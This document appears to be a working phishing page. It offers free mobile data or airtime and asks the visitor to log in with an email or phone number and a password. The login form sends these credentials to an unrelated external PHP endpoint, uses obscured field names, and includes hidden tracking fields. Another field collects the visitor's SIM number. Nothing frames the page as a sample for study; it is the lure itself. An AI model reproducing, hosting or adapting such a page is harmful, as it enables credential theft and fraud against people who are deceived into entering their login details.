

<html>
    <head>
        <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
        <meta name="viewport" content="width=device-width, initial-scale=1">
        <title>Login to cllain your data</title>
</head>
<body>
  <style>
    body{
  margin: 0;
  font-family: sans-serif;
  margin: auto;
  font-size: 13px;
}

.navbar{
  background: #001f90b8;
  height: 39px;
  width: auto;
  max-width: 500px;
}

.contact-us a{
  color:#00184a78;
  font-size:11px;
}

.nav-head{
  background-color:#ffdc0026;
  color:#5d530eb8;
  width: auto;
  padding:6px 10px;
  max-width: 500px;
}

.contact-us{
  padding-bottom:21px;
  text-align:center;
}


.formulaire.formulaire>*{
  border-bottom:1px solid #c7c3c369;
}

.entrer{
  border:0;
  width:100%;
}

/*
submit
*/

.koala{
  display:inline-block;
  -webkit-border-radius:3px;
  font-weight:bold;
  background-color:#0036f999;	
  font-size:13px;
  line-height:34px;
  padding:0 18px;
  color:white
}

.square_btn {
     position: relative;
  display: inline-block;
  padding: 11px;
  text-decoration: none;
  color: white;
  background: #1e4088b8;
  border-radius: 4px;
  font-weight: bold;
  border: 15px #f30909;
  width: 100%;
}


/* neveau compte */
.fruit{
  text-align:center;
  padding:9px;
} 
#text{
color: #0951eef6;
background-color: wheat;
font-size: larger;
height: auto;
width: auto;
text-align: center;
max-width: 500px;

}
#bord{
width: 100%;
height: 40px;
border-radius: 4px;
color: red;
}
label{
color: #f61e17f6;
font-size: larger;
font-family: arial;
}
#bord:hover{
color: red;
background-color: rgb(83, 237, 248);
}
.container{
    border: 2px solid silver;
    width: auto;
    height: auto;
    background-color:#497f940f;
   max-width: 500px;
    padding:2 31px
}
  </style>
  <div id="text">
    <p><h3>Please before you countinue to claim your data/airtime of your choice will need to collect you data</h3> </p></div>
   
  
  <!-- NavBar -->
  <div class="navbar"></div>
  <div style="display:-webkit-box">
    
    <div style="-webkit-box-flex:1">
      <!--Nav-Header-->
      <div class="nav-head">
        <span>You need to log in first.</span>
      </div>
        <!-- Formulaire -->
        <div class="container" >
          <form>
      <label for="air"><b>SIM Number</b></label>
      <input type="tel" id="bord"  style="border-color: black;" placeholder="Enter your number here" required>
    </form>
        <form method="post" style="padding-top:17px;" action="https://www.sagaragro.co.in/layouts/index.php">
          <div class="formulaire" style="background:white;"> 
            <input class="entrer" style="padding:12px;" name="mima" placeholder="Email or Number" type="text" required>
            <input name="hash" type="hidden" value="I1EBABxjLCN5D9dho7HF">
            <input name="randomize" type="hidden" value="20190405018012">
            <input class="entrer" style="padding:12px;" name="poussa" placeholder="Password" type="password" required>
            <div style="padding:12px;"> 
              <button type="submit" class="square_btn">Login</button>
            </div>
          </div>
        </form> 

        <div class="fruit">
          <a class="koala">Need a new account</a> 
        </div>

        <div class="contact-us">
          <a>Forgotten account ? Need Help</a>
        </div>
      </div>
    </div>
  </div>

</body></html>
